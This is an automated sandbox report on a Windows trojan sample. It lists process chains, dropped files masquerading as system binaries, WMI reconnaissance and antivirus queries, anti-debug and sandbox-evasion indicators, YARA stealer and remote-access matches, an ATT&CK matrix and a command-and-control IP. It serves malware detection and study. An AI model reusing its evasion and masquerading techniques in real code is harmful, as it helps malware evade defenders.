                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\savesSession\ComponentBrokermonitor.exe Memory allocated: 1340000 memory reserve | memory write watch
                          Source: C:\savesSession\ComponentBrokermonitor.exe Memory allocated: 1AE50000 memory reserve | memory write watch
                          Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 2ED0000 memory reserve | memory write watch
                          Source: C:\Recovery\RuntimeBroker.exe Memory allocated: 1AED0000 memory reserve | memory write watch
                          Source: C:\savesSession\ComponentBrokermonitor.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\RuntimeBroker.exe Thread delayed: delay time: 600000
                          Source: C:\Recovery\RuntimeBroker.exe Thread delayed: delay time: 300000
                          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                          Source: C:\Recovery\RuntimeBroker.exe Window / User API: threadDelayed 3435
                          Source: C:\Recovery\RuntimeBroker.exe Window / User API: threadDelayed 6245
                          Source: C:\savesSession\ComponentBrokermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MqhNXtrC.log
                          Source: C:\Recovery\RuntimeBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lAIZxBgi.log
                          Source: C:\savesSession\ComponentBrokermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HufwPOBJ.log
                          Source: C:\Recovery\RuntimeBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yZRgoalJ.log
                          Source: C:\Recovery\RuntimeBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ERuFRGqx.log
                          Source: C:\Recovery\RuntimeBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vomPhMaQ.log
                          Source: C:\savesSession\ComponentBrokermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\odsQwJqu.log
                          Source: C:\Recovery\RuntimeBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HCaVYTBq.log
                          Source: C:\savesSession\ComponentBrokermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PYnlzHQq.log
                          Source: C:\savesSession\ComponentBrokermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jpaRTMbF.log
                          Source: C:\Recovery\RuntimeBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eKDszVMz.log
                          Source: C:\savesSession\ComponentBrokermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yIzGwiSf.log
                          Source: C:\Recovery\RuntimeBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gNqaUEQu.log
                          Source: C:\savesSession\ComponentBrokermonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JfKMXbLC.log
                          Source: C:\savesSession\ComponentBrokermonitor.exe TID: 2044 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6656 Thread sleep time: -30000s >= -30000s
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772 Thread sleep time: -29514790517935264s >= -30000s
                          Source: C:\Recovery\RuntimeBroker.exe TID: 6772 Thread sleep time: -600000s >= -30000s
                          Source: C:\Recovery\RuntimeBroker.exe TID: 7060 Thread sleep time: -600000s >= -30000s
                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\savesSession\ComponentBrokermonitor.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E1E6A3 VirtualQuery,GetSystemInfo
                          Source: C:\Recovery\RuntimeBroker.exe Thread delayed: delay time: 30000
                          Source: C:\savesSession\ComponentBrokermonitor.exe File opened: C:\Users\user
                          Source: C:\savesSession\ComponentBrokermonitor.exe File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\savesSession\ComponentBrokermonitor.exe File opened: C:\Users\user\AppData
                          Source: C:\savesSession\ComponentBrokermonitor.exe File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\savesSession\ComponentBrokermonitor.exe File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\savesSession\ComponentBrokermonitor.exe File opened: C:\Users\user\AppData\Local
                          Source: wscript.exe, 00000001.00000002.1735895163.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f56
                          Source: FNDmTgDttMjJpiTujJnAGafC.exe.4.dr Binary or memory string: IdcncAvMCIK6eHptdyHC
                          Source: w32tm.exe, 00000008.00000002.1816399189.00000198676E8000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2901752141.000000001B943000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: wscript.exe, 00000001.00000003.1732498622.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe API call chain: ExitProcess graph end node graph_0-25053
                          Source: C:\savesSession\ComponentBrokermonitor.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E27DEE mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E2C030 GetProcessHeap
                          Source: C:\savesSession\ComponentBrokermonitor.exe Process token adjusted: Debug
                          Source: C:\Recovery\RuntimeBroker.exe Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E1F838
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1F9D5 SetUnhandledExceptionFilter,0_2_00E1F9D5
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E1FBCA
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E28EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E28EBD
                          Source: C:\savesSession\ComponentBrokermonitor.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\savesSession\ComponentBrokermonitor.exe "C:\savesSession/ComponentBrokermonitor.exe"
                          Source: C:\savesSession\ComponentBrokermonitor.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat"
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerp
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.4",5,1,"","user","980108","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","GXCTDM5 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]8*
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E1F654 cpuid 0_2_00E1F654
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00E1AF0F
                          Source: C:\savesSession\ComponentBrokermonitor.exe Queries volume information: C:\savesSession\ComponentBrokermonitor.exe VolumeInformation
                          Source: C:\savesSession\ComponentBrokermonitor.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Recovery\RuntimeBroker.exe Queries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                          Source: C:\Recovery\RuntimeBroker.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E1DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00E1DF1E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exe Code function: 0_2_00E0B146 GetVersionExW,0_2_00E0B146
                          Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Recovery\RuntimeBroker.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara match; File source: 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: Process Memory Space: ComponentBrokermonitor.exe PID: 3492, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: RuntimeBroker.exe PID: 6340, type: MEMORYSTR
                          Source: Yara match; File source: 4.0.ComponentBrokermonitor.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000004.00000000.1733341807.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match; File source: C:\savesSession\ComponentBrokermonitor.exe, type: DROPPED
                          Source: Yara match; File source: C:\Users\Default\Videos\OfficeClickToRun.exe, type: DROPPED
                          Source: Yara match; File source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, type: DROPPED
                          Source: Yara match; File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara match; File source: C:\savesSession\winlogon.exe, type: DROPPED
                          Source: Yara match; File source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, type: DROPPED

                          Remote Access Functionality

                          Source: Yara match; File source: 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: Process Memory Space: ComponentBrokermonitor.exe PID: 3492, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: RuntimeBroker.exe PID: 6340, type: MEMORYSTR
                          Source: Yara match; File source: 4.0.ComponentBrokermonitor.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000004.00000000.1733341807.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match; File source: C:\savesSession\ComponentBrokermonitor.exe, type: DROPPED
                          Source: Yara match; File source: C:\Users\Default\Videos\OfficeClickToRun.exe, type: DROPPED
                          Source: Yara match; File source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, type: DROPPED
                          Source: Yara match; File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara match; File source: C:\savesSession\winlogon.exe, type: DROPPED
                          Source: Yara match; File source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, type: DROPPED
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | 11 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 11 Scripting | 12 Process Injection | 12 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                          Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 351 Security Software Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 251 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Process Injection | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 3 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 157 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                          [Behavior graph, ID 1582936. Sample: voed9G7p5s.exe; start date: 01/01/2025; architecture: WINDOWS; score: 100. Process chain shown: voed9G7p5s.exe -> wscript.exe -> cmd.exe -> ComponentBrokermonitor.exe -> cmd.exe -> RuntimeBroker.exe, which contacts 185.239.51.56 (MGNHOST-ASRU, Russian Federation).]

                          Source | Detection | Scanner | Label
                          voed9G7p5s.exe | 58% | Virustotal |
                          voed9G7p5s.exe | 71% | ReversingLabs | Win32.Trojan.Uztuby
                          voed9G7p5s.exe | 100% | Joe Sandbox ML |

                          Source | Detection | Scanner | Label
                          C:\savesSession\ComponentBrokermonitor.exe | 100% | Avira | HEUR/AGEN.1323342
                          C:\Users\user\Desktop\MqhNXtrC.log | 100% | Avira | TR/AVI.Agent.updqb
                          C:\savesSession\winlogon.exe | 100% | Avira | HEUR/AGEN.1323342
